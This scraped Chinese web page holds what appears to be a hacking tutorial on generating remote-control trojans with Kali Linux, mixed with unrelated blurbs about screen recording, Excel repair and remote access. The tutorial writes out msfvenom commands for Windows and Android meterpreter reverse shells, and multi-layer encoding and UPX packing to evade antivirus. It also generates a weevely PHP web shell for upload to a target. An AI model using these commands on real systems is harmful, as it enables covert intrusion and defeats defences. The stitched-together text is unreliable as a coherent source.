win10電腦怎么屏幕錄制
擁有豐富的功能,且內置了多樣的錄制模式,包括了視頻錄制、游戲錄制、音頻錄制、排除窗口錄制等等。錄制的操作簡單易懂,僅需3個步驟,就能進行快捷專業的錄屏,哪怕從未接觸過錄屏軟件的也能夠快速上手具體操作步...
2025.07.02COPYRIGHT ? 2023
粵ICP備2021108052號
郵箱:611661226@qq.com
留言給我1生成被控端2、啟動主控端3、
Netcat 瑞士軍刀
掃描端口
建立連接
掃描某IP地址的指定端口
nc -v ip port
連接指定IP地址的指定端口的命令如下
nc ip port
以靶機Metasploitable 2的80端口為例測試
控制軟件如果是正向的,受害者計算機執行遠程控制被控端之后,會在自己主機上打開一個端口,等待hacker連接,受害者計算機不會主動通知計算機,因此hacker必須知道計算機A的IP地址
控制軟件如果是反向的,受害者計算機執行遠程控制被控端之后,會主動通知hacker,因此黑客無須知道受害者計算機的IP地址,目前主要使用的方式
1、如何使用MSFPC生成被控端 linux
各種類型的被控端
生成linux的被控端,IP選擇本機的etho網卡
運行run,很快就建好了一個handler,這就是對應被控終端的主控端
2、如何在kali linux2 中生成被控端
msfpc 是MSFvenom的優化版
┌──(rootkali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: /var/payload.exe
這里我們使用msfvenom命令生成一個被控端,使用的被控端就是一個用于windows操作系統的反向遠程控制軟件,即windows/meterpreter/reverse_tcp lhost=192.168.8.128是所使用的的kalilinux的虛擬機IP地址
使用以下命令可以查看所有可以使用的攻擊載荷
name攻擊載荷的名稱 操作系統+控制方式+模塊
查找Metasploit 可以在Android操作系統下運行的meterpreter
查看攻擊載荷需要設置的參數
msfvenom --list-options -p windows/meterpreter/reverse_tcp
2、如何在kali linux2中啟動主控端
輸入msfconsole啟動metasploit
在metasploit中使用handler作為主控端
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /root/payload.exe
3、遠程控制被控端與殺毒軟件的博弈
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe
消除payload.exe的特征碼,msf編碼器可以將原可執行程傳重新編碼,生成一個新的二進制文件,這個文件執行后,msf編碼器會將原可執行程序解碼到內存中并執行
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/nonalpha -f c
-e 選擇的編碼器,使用 x86/nonalpha編寫方式的到的shellcode如圖所示
x86/shikata_ga_nai 兩次生成的shellcode雖然功能相同,但是代碼已經不同了,這也是黑客鐘愛的編碼方式,可以進行多次編碼 -i 編碼次數
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f -raw | msfvenom -e x86/alpha_upper -a x86/countdown -a x86 --platform windows -i 10 -f exe -o /var/payload.exe
3.1 加殼也是對抗基于文件掃描和內存掃描的反病毒技術
加殼工具UPX
upx /var/payload.exe
3.2 powersploit免殺
4、Meterpreter在Android中的應用
4.1查找在Android運行的攻擊載荷
下面以 android/meterpreter/reverse_tcp 為例
msfvenom --list-options -p android/meterpreter/reverse_tcp
執行完畢后可以看到被控端的參數
測試環境
1、Android手機IP地址 192.168.1.101
2、kalilinux 安裝到虛擬機改用橋接模式 192.168.1.34
3、無線路由192.168.1.1
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=9999 R>/var/pentest.apk
這條命令執行完畢后就在var目錄生成了一個pentest.apk的文件
4、建立主控端
啟動Metasploit
msfconsole
5、對web實現遠程控制
中國菜刀 中國蟻劍 冰蝎 weevely(生成PHP木馬)
weevely generate 123456 /home/kali/Downloads/testweb.php
password 是生成木馬的密碼 path是路徑 filename 文件名
把后門傳到靶機里
擁有豐富的功能,且內置了多樣的錄制模式,包括了視頻錄制、游戲錄制、音頻錄制、排除窗口錄制等等。錄制的操作簡單易懂,僅需3個步驟,就能進行快捷專業的錄屏,哪怕從未接觸過錄屏軟件的也能夠快速上手具體操作步...
2025.07.02excel是我們經常用來制作表單文檔的工具。但是最近有用戶遇到了打開excel文件顯示損壞的情況,很苦惱不知道怎么修復。那么針對這個問題,小編就為小伙伴們帶來了關于excel文件損壞的處理方法,大...
2025.07.02通過電腦進行遠程設置和維護,非常高效和經濟,需要經過網絡連接被控制端電腦桌面,操作被控制端電腦上面的一切設置,都像電腦工程師在電腦屏幕面前操作一樣,操作的什么內容和步驟客戶都可以看得到,通過這樣的遠程...
2025.06.30如下圖,我就在各客戶端和NAS上安裝了tailscale,實現了遠程訪問。tailscale另一個重要的功能是可以借助局域網中安裝了tailscale客戶端的機器做為網關,并添加子網路由,來實現直接在...
2025.06.292008-05-07 22:35:11剛學到的:Linux遠程登錄Windows--rdesktop的使用rdesktop 的使用 1.遠程Windows 系統的設置 這里以連接Windows X...
2025.07.01